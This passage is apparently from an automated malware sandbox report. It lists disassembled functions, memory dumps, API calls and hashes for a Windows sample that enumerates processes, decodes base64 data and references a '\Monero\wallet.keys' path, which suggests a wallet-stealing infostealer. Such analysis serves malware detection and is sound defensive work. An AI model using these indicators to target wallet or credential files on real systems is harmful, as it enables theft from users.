                          • Instruction ID: 0ef765fbde70319c99776f8ca52b47ba01c5830910a1ecf0ffa33a57530e512b
                          • Opcode Fuzzy Hash: 56511569f446b05eb67512e9d9c271479ef0d185173caced42b7b8f550e77787
                          • Instruction Fuzzy Hash: C67205F36082009FE704AE2DEC8177ABBE9EF94320F16493DE6C5C7744E67598058697
                          Function 00CE4AAA Relevance: 7.3, Strings: 5, Instructions: 1099COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A{+$C23$e{@$f2{|$r![
                          • API String ID: 0-2412079535
                          • Opcode ID: 0566040d0fda3db46f34fae0d2fbd774b57026d9f01097c21d9fd0e6ca515149
                          • Instruction ID: e6d6b324dc9a60ea299cd7a8a0ae89d23129cc466e3b6c45b7439720cf851f7b
                          • Opcode Fuzzy Hash: 0566040d0fda3db46f34fae0d2fbd774b57026d9f01097c21d9fd0e6ca515149
                          • Instruction Fuzzy Hash: C972E8F3A0C604AFE3046E2DDC8567ABBE9EF94620F1A493DE6C4C7344E63598058797
                          Function 00CE0E93 Relevance: 6.6, Strings: 4, Instructions: 1650COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ?|{$tW$wow$W\
                          • API String ID: 0-988627700
                          • Opcode ID: 547d38e6a3dc18ff557f4bf41553164df40291d50b662e6d1925ab404000535c
                          • Instruction ID: 74d954035e4bde1637b4babac325283a08a8c940c28cbffd8f804ce105136ac6
                          • Opcode Fuzzy Hash: 547d38e6a3dc18ff557f4bf41553164df40291d50b662e6d1925ab404000535c
                          • Instruction Fuzzy Hash: 24B207F3A082149FE304AE2DEC8567ABBE5EF94720F16893DEAC4C7744E63558058793
                          Function 00CDD9A4 Relevance: 6.6, Strings: 4, Instructions: 1644COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1>tq$1\ou$L>q<$qY{
                          • API String ID: 0-2118222111
                          • Opcode ID: 172f355cce8d8b559b0c500318d965d6edbcd5f9fe75880a4a0432fd4906680a
                          • Instruction ID: ccf97107b0ac4a9aef3dc9f8d8ac69480dddd845c595b5ae3298a05cf8886689
                          • Opcode Fuzzy Hash: 172f355cce8d8b559b0c500318d965d6edbcd5f9fe75880a4a0432fd4906680a
                          • Instruction Fuzzy Hash: 20B218F3A0C604AFE3046E2DEC8577ABBE5EF94720F164A3DEAC4C3744E93558058696
                          Function 00928680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009305B7), ref: 009286CA
                          • Process32First.KERNEL32(?,00000128), ref: 009286DE
                          • Process32Next.KERNEL32(?,00000128), ref: 009286F3
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • CloseHandle.KERNEL32(?), ref: 00928761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                          • Instruction ID: 3662cea85cc95627562d292a03bed5972a0cf361349533582b7425140ebe3fe9
                          • Opcode Fuzzy Hash: a29ab664b19ee4e924ad400010b24eab97ac309dd334a159d7aeeda2e5aaecd4
                          • Instruction Fuzzy Hash: 2A315E72901228ABCB24DB51EC51FEEB77CEB88700F104199E509A21A4DF346A45CFA1
                          Function 00928EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00915184,40000001,00000000,00000000,?,00915184), ref: 00928EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                          • Instruction ID: a411cdbb33008e5cfee63dc8b0b1c76198009216bc8c7b68794b326fd0055efb
                          • Opcode Fuzzy Hash: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                          • Instruction Fuzzy Hash: 92112A74201208FFEB00DF64EC84FAB37A9AF89301F109948F9198B258DB35EC41DBA0
                          Function 00919AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                          • LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                          • Instruction ID: 535c3fa4fe0850cc4c1f2e5a69a965aae4bf55ec899c6adbc605576249451ea2
                          • Opcode Fuzzy Hash: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                          • Instruction Fuzzy Hash: 4511A4B4240308AFEB11CF64DC95FAA77B9FB89701F208199F9159B390C775A941CB50
                          Function 00927980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E00,00000000,?), ref: 009279B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009279B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00930E00,00000000,?), ref: 009279C4
                          • wsprintfA.USER32 ref: 009279F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                          • Instruction ID: bf62f43a8b33909047004289ecbc0b29d25ce35526e74752f5d2cabb5f2ebb10
                          • Opcode Fuzzy Hash: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                          • Instruction Fuzzy Hash: 2B112AB2904218ABCB14DFC9DD45BBEB7F8FB4CB12F10425AF605B2280E6395940CBB1
                          Function 00927A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01050080,00000000,?,00930E10,00000000,?,00000000,00000000), ref: 00927A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01050080,00000000,?,00930E10,00000000,?,00000000,00000000,?), ref: 00927A7D
                          • wsprintfA.USER32 ref: 00927AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                          • Instruction ID: e5e9789e9c60891d235cde276638f82a3d24814ee74d464e8623af2d88173c65
                          • Opcode Fuzzy Hash: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                          • Instruction Fuzzy Hash: 051152B1945228EBDB108B54EC59F69B778F744721F1047D5E516A32C0D7745A40CF51
                          Function 00CDBF1E Relevance: 5.4, Strings: 3, Instructions: 1606COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7]b$D9~m$):
                          • API String ID: 0-873614868
                          • Opcode ID: 7a9f0292fa34b84636c3eb34ded0a5d67c679b6b1dd258a15a6fe6e5e593e0d9
                          • Instruction ID: 5fbb004a871251950cdcd98b2e156a75ba15102bbd42089798056815343a6981
                          • Opcode Fuzzy Hash: 7a9f0292fa34b84636c3eb34ded0a5d67c679b6b1dd258a15a6fe6e5e593e0d9
                          • Instruction Fuzzy Hash: 88B24BF3A0C2049FE3046E2DEC8567ABBE9EB94760F16493DEAC4C7744EA3558018797
                          Function 00C260C7 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6x{w$FpK$IQ$$$JpK
                          • API String ID: 0-2939090419
                          • Opcode ID: 459603bb63ebfbdc6ed7330126edbfea83b75edc728db9b774a491af1a2b881d
                          • Instruction ID: 2e1a8f68603daa188c6019f64c9facd1ffba61a53b9e9fe67eb166f58f046f6b
                          • Opcode Fuzzy Hash: 459603bb63ebfbdc6ed7330126edbfea83b75edc728db9b774a491af1a2b881d
                          • Instruction Fuzzy Hash: 17713CF3A086105FF3489929EC85777BBD5EBD4320F16863EEAC9D3740E9755C048296
                          Function 00923720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0092E118,00000000,00000001,0092E108,00000000), ref: 00923758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009237B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                          • Instruction ID: d0598a9dbb3e7f1d310abdbb3cee1b6fa1b49463ef78983d0ce42c192c8ceb7a
                          • Opcode Fuzzy Hash: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
